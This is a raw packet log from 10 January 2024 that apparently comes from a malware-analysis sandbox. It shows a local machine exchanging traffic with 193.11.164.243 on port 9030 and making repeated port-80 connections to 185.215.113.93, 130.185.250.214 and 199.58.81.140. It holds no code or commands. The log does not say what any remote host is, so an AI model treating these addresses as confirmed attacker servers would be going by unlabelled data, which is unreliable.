Jan 10, 2024 15:40:28.081444025 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081480980 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081561089 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081579924 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081579924 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081579924 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081581116 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081600904 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081639051 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081655979 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081655979 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081676006 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081681967 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081712961 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081728935 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081748962 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081753016 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081784964 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081800938 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081820965 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081845045 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081859112 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081865072 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081909895 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.083906889 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.083945036 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.083981037 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.083983898 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084006071 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084017992 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084053040 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084068060 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084069967 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084091902 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084114075 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084784031 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084800959 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084816933 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084861040 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084868908 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084881067 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084887981 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084919930 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084932089 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084955931 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.084964037 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.084995985 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.085007906 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.085032940 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.085038900 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.085072041 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.085082054 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.085114002 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.085118055 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.085135937 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.085172892 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.085172892 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.094654083 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.252270937 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.252589941 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.252749920 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.252749920 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.262833118 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.262854099 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.262868881 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.262912035 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.262938023 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.262947083 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.262983084 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263016939 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.263037920 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263087034 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263122082 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.263144970 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263183117 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.263195038 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263274908 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263308048 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.263360023 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263447046 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.263479948 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.264359951 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264410019 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264410973 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.264470100 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264487028 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264506102 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.264523983 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.264555931 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264643908 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264676094 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.264776945 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264847994 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264885902 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.264915943 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264947891 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.264954090 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.265038967 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.265078068 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.265088081 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.265609980 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.277609110 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.277652025 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.277719021 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.277755022 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.277765036 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.277791977 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.277806044 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.277827978 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.277868032 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.277960062 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.278012037 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.278072119 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.278235912 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.278290033 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.278322935 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.278361082 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.278394938 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.278462887 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.278501987 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.281409025 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281621933 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.281629086 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281666994 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281702042 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281704903 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.281740904 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281776905 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281781912 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.281810999 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.281815052 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281850100 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281884909 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.281908035 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.281981945 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.282021046 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.282083035 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.282119036 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.282119989 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.282155991 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.286576033 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286617994 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286653996 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286678076 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.286689043 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286705971 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.286726952 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.286727905 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286763906 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286799908 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.286838055 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286874056 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286911964 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.286942959 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.286981106 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.287013054 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.287100077 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.287134886 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.287137032 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.287790060 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.287827015 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.287837029 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.287900925 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.287936926 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.287974119 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288012028 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288100004 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288160086 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288199902 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288235903 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288270950 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288310051 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288374901 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288463116 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288500071 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288501024 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288538933 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288604975 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288697958 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288712025 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288741112 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288773060 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288814068 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288814068 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288853884 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288885117 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288921118 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288921118 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.288960934 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.288994074 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289030075 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289032936 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289067984 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289102077 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289135933 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289138079 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289175034 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289207935 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289244890 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289295912 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289334059 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289365053 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289400101 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289491892 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289527893 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289652109 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289688110 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289724112 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.289947033 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.289983988 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290021896 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290071964 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290107965 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290143967 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290182114 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290219069 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290222883 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290260077 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290297985 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290338039 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290371895 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290375948 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290442944 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290478945 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290478945 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290548086 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290580988 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290679932 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290714979 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290808916 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290846109 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.290880919 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.290960073 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.291614056 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.291655064 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.291707993 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.291747093 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.291812897 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.291918039 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.291960001 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.291970968 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292072058 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292120934 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292156935 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292193890 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292195082 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292304993 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292341948 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292351007 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292460918 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292499065 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292592049 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292629004 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292649031 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292687893 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292727947 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292756081 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292793989 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292828083 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292861938 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292896986 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.292898893 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.292999983 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.293035030 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.293036938 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.293592930 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:34.021070957 CET	49747	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:34.265106916 CET	80	49747	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:34.265201092 CET	49747	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:34.265763998 CET	49747	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:34.508083105 CET	80	49747	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:34.508837938 CET	80	49747	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:34.508908033 CET	49747	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:35.519639969 CET	49747	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:35.520406961 CET	49748	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:35.765852928 CET	80	49747	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:35.765923023 CET	80	49748	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:35.766024113 CET	49747	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:35.766043901 CET	49748	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:35.766335964 CET	49748	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:36.009236097 CET	80	49748	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:36.009268999 CET	80	49748	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:36.009325027 CET	49748	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:37.017977953 CET	49748	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:37.018570900 CET	49749	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:37.261773109 CET	80	49748	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:37.261835098 CET	80	49749	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:37.261957884 CET	49748	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:37.262011051 CET	49749	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:37.262275934 CET	49749	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:37.505862951 CET	80	49749	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:37.505966902 CET	80	49749	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:37.506079912 CET	49749	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:38.518497944 CET	49749	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:38.518901110 CET	49750	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:38.760972977 CET	80	49749	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:38.761084080 CET	49749	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:38.761404037 CET	80	49750	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:38.761483908 CET	49750	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:38.761794090 CET	49750	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:39.004103899 CET	80	49750	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:39.004462004 CET	80	49750	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:39.004534006 CET	49750	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:40.017882109 CET	49750	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:40.018472910 CET	49751	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:40.260430098 CET	80	49750	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:40.260483980 CET	49750	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:40.261643887 CET	80	49751	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:40.261720896 CET	49751	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:40.262161970 CET	49751	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:40.505868912 CET	80	49751	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:40.505892038 CET	80	49751	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:40.505984068 CET	49751	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:41.517927885 CET	49751	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:41.528872013 CET	49752	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:41.760427952 CET	80	49751	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:41.763967037 CET	49751	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:41.770143986 CET	80	49752	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:41.772531986 CET	49752	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:41.772838116 CET	49752	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:42.014013052 CET	80	49752	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:42.014041901 CET	80	49752	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:42.014095068 CET	49752	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:45.782340050 CET	49752	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:46.023921967 CET	80	49752	185.215.113.93	192.168.2.6
Jan 10, 2024 15:40:46.023986101 CET	49752	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:41:09.419291973 CET	49755	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:41:10.594491005 CET	49755	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:41:12.594491005 CET	49755	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:41:16.594507933 CET	49755	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:41:24.594077110 CET	49755	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:41:30.685645103 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.793318987 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.793422937 CET	49756	80	192.168.2.6	199.58.81.140
